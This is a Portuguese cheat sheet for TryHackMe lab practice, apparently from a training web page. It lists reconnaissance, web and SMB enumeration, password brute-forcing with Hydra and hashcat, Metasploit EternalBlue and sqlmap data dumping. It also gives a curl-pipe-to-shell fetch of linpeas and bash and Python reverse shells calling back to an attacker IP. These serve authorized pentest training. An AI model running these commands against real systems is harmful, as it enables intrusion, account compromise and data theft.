Bem-vindo ao Guia TryHackMe
Aprenda segurança ofensiva em ambientes legais e autorizados
Criar Conta
Registre-se grátis em tryhackme.com
Conectar VPN
Baixe e configure o OpenVPN
Iniciar Máquina
O site fornece o IP do alvo
Usar Comandos
Substitua <IP_DO_LAB> pelo IP
Encontrar Flags
Complete os desafios do lab
👈 Selecione um módulo no menu lateral para começar
🔍 Reconhecimento
Primeira fase: descobrir o que está rodando no alvo
📡 Nmap - Varredura Básica
▼$ nmap -sV -sC <IP_DO_LAB>
-sC executa scripts padrão de detecção do Nmap.
Substitua <IP_DO_LAB> pelo IP que o TryHackMe fornece ao iniciar a máquina.
📡 Nmap - Varredura Completa
▼$ nmap -A -p- -T4 <IP_DO_LAB>
-p- escaneia todas as 65535 portas.
-T4 acelera a varredura.
📡 Nmap - Varredura UDP
▼$ sudo nmap -sU --top-ports 20 <IP_DO_LAB>
--top-ports 20 verifica as 20 portas UDP mais comuns.
🔎 Whois
▼$ whois <DOMINIO>
Mostra proprietário, servidores DNS, datas de registro.
🔎 Dig - Consulta DNS
▼$ dig <DOMINIO> ANY
Mostra registros A, AAAA, MX, NS, TXT, etc.
🌐 Enumeração Web
Descobrir diretórios, arquivos e tecnologias do servidor web
📂 Gobuster - Diretórios
▼$ gobuster dir -u http://<IP_DO_LAB> -w /usr/share/wordlists/dirb/common.txt
dir = modo diretório.
-u = URL alvo.
-w = wordlist (lista de palavras para testar).
📂 Gobuster - Com Extensões
▼$ gobuster dir -u http://<IP_DO_LAB> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,bak
Procura arquivos como login.php, config.txt, index.bak.
🔬 Nikto - Scanner Web
▼$ nikto -h http://<IP_DO_LAB>
Detecta configurações inseguras, arquivos expostos, versões vulneráveis.
🔬 WhatWeb - Identificação
▼$ whatweb http://<IP_DO_LAB>
📋 Curl - Cabeçalhos HTTP
▼$ curl -I http://<IP_DO_LAB>
Mostra Server, X-Powered-By, cookies, etc.
📋 Curl - Código Fonte
▼$ curl -s http://<IP_DO_LAB>
Procure comentários, links ocultos, credenciais no código.
📁 Enumeração SMB
Descobrir compartilhamentos, usuários e permissões via SMB
📁 Enum4linux
▼$ enum4linux -a <IP_DO_LAB>
Lista usuários, compartilhamentos, grupos e políticas de senha.
📁 SMBclient - Listar
▼$ smbclient -L //<IP_DO_LAB> -N
-N tenta sem senha (acesso anônimo).
📁 SMBclient - Conectar
▼$ smbclient //<IP_DO_LAB>/compartilhamento -N
Use ls para listar e get arquivo para baixar.
📁 SMBmap
▼$ smbmap -H <IP_DO_LAB>
Indica se você pode ler, escrever ou executar.
🔑 Força Bruta
Testar credenciais e quebrar hashes em laboratórios
🔑 Hydra - SSH
▼$ hydra -l <USUARIO> -P /usr/share/wordlists/rockyou.txt ssh://<IP_DO_LAB>
-P = arquivo com lista de senhas.
rockyou.txt é a wordlist mais usada em CTFs.
🔑 Hydra - FTP
▼$ hydra -l <USUARIO> -P /usr/share/wordlists/rockyou.txt ftp://<IP_DO_LAB>
Testa combinações de senha automaticamente.
🔑 Hydra - Login HTTP
▼$ hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP_DO_LAB> http-post-form "/login:username=^USER^&password=^PASS^:F=incorreto"
^USER^ e ^PASS^ são substituídos automaticamente.
F=incorreto é o texto que aparece quando a senha está errada.
🔓 John - Quebrar Hash
▼$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Salve o hash em hash.txt antes de executar.
Suporta MD5, SHA, bcrypt e muitos outros.
🔓 Hashcat - GPU
▼$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
-m 0 = MD5 | -m 1000 = NTLM | -m 1800 = SHA-512
💣 Exploração
Usar vulnerabilidades encontradas para obter acesso
🔍 Searchsploit
▼$ searchsploit apache 2.4.49
Substitua pelo serviço e versão detectados pelo Nmap.
🧰 Metasploit - Fluxo Completo
▼$ msfconsole
msf> search eternalblue
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS <IP_DO_LAB>
msf> set LHOST <SEU_IP_VPN>
msf> exploit
search busca módulos de exploit.
use seleciona o módulo.
RHOSTS = IP do alvo no lab.
LHOST = seu IP na VPN do TryHackMe.
exploit executa o ataque.
💉 SQLMap - Injeção SQL
▼$ sqlmap -u "http://<IP_DO_LAB>/pagina?id=1" --dbs
--dbs = lista bancos de dados.
--tables -D banco = lista tabelas.
--dump -T tabela -D banco = extrai dados.
🏴 Pós-Exploração
Após obter acesso: encontrar flags e escalar privilégios
🏴 Encontrar Flag
▼$ find / -name 'flag.txt' 2>/dev/null
2>/dev/null oculta erros de permissão.
As flags são as respostas dos desafios do TryHackMe.
👤 Verificar Usuário Atual
▼$ whoami && id && hostname
id = mostra grupos e permissões.
hostname = nome da máquina.
⬆️ SUDO - Verificar Permissões
▼$ sudo -l
Consulte gtfobins.github.io para técnicas de escalação.
⬆️ SUID - Binários Especiais
▼$ find / -perm -4000 2>/dev/null
Estes executam com privilégios do dono (geralmente root).
Consulte gtfobins.github.io para explorar.
🤖 LinPEAS - Escalação Automática
▼$ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Verifica SUID, cron jobs, configurações fracas, senhas em arquivos, etc.
🐚 Shells Reversos
Obter conexão reversa do alvo para sua máquina
👂 Listener Netcat (sua máquina)
▼$ nc -lvnp 4444
-l = listen | -v = verbose | -n = sem DNS | -p = porta
🐚 Reverse Shell - Bash
▼$ bash -i >& /dev/tcp/<SEU_IP>/4444 0>&1
Substitua <SEU_IP> pelo seu IP na VPN do TryHackMe.
🐍 Reverse Shell - Python
▼$ python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<SEU_IP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
Substitua <SEU_IP> pelo seu IP.
✨ Estabilizar Shell
▼$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
# Pressione Ctrl+Z
$ stty raw -echo; fg
Permite usar Ctrl+C, Tab, setas, histórico.
Essencial após obter qualquer reverse shell.
📚 Salas Recomendadas do TryHackMe
Ambientes legais e autorizados para praticar cada técnica
📌 Tutorial
Como usar a plataforma TryHackMe
📌 OpenVPN
Configurar VPN para conectar aos laboratórios
📌 Nmap
Aprender varredura de portas e detecção de serviços
📌 Network Services
Explorar SMB, FTP e Telnet em ambiente controlado
📌 Web Fundamentals
HTTP, cookies, HTML e funcionamento da web
📌 Linux Fundamentals
Comandos Linux básicos essenciais para pentesting
📌 Basic Pentesting
Pentest completo guiado do início ao fim
📌 OWASP Top 10
As 10 principais vulnerabilidades web do mundo
📌 Vulnversity
Reconhecimento → Upload de Shell → Escalação para Root
📌 Kenobi
Explorar SMB, FTP e escalar privilégios em Linux
📌 Pickle Rick
CTF web divertido com tema de Rick and Morty
📌 Buffer Overflow Prep
Exploração de memória e buffer overflow
📌 Attacktive Directory
Ataques em Active Directory Windows
📌 Internal
Pentest realista completo — nível profissional